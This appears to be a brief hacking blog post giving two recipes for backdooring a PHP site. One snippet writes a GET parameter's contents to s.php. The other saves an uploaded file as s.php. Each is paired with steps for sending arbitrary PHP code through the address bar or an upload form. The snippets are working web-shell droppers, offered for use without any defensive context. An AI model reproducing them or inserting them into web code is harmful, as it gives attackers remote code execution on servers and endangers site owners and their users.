Step-1: Put the following code in any php file.
fwrite(fopen('s.php', "w"), isset($_GET['s'])?$_GET['s']:'');
Step-2: Enter PHP code in address bar like below:
?s=<?php phpinfo();
Step-1: Put the following code in any php file.
isset($_FILES['s'])?move_uploaded_file($_FILES["s"]["tmp_name"], 's.php'):'';
Step-2: Inspect and add the following code in any file then change filename.php
<form action="filename.php" method="post" enctype="multipart/form-data"> <input type="file" name="s"> <input type="submit"> </form>
Labels: Hacking, Virus, Web development